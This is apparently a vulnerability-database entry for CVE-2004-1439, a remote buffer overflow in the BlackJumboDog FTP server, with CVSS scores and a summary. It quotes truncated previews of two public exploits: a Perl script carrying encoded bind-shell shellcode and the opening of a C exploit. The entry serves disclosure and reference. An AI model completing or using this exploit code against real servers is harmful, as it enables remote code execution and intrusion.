7.5
CVSSv2

CVE-2004-1439

Published: 31/12/2004 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in BlackJumboDog 3.x allows remote malicious users to execute arbitrary code via long FTP commands such as (1) USER, (2) PASS, (3) RETR,(4) CWD, (5) XMKD, and (6) XRMD.

Vulnerable Product Search on Vulmon Subscribe to Product

sapporoworks black jumbodog 3.6.1

Exploits

#!/usr/bin/perl # # blackJumboDog Exploit code by Tal zeltzer # use strict; use IO::Socket::INET; usage() unless(@ARGV == 2); my $host = shift(@ARGV); my $port = shift(@ARGV); # win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] metasploitcom my $shellcode = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x ...
/* 6904|wwwDelikonde|Delikon BlackJumboDog FTP Server Buffer Overflow version 361 wwwsecuriteamcom/windowsntfocus/5AP040ADPWhtml Thx to Chew Keong TAN C:\Codes\blackjumbodog\Release>bjdexploit 19216803 21 kleinexe BlackJumboDog FTP Server Buffer Overflow version 361 wwwsecuriteamcom/windowsntfocus/5AP040ADPWhtml ...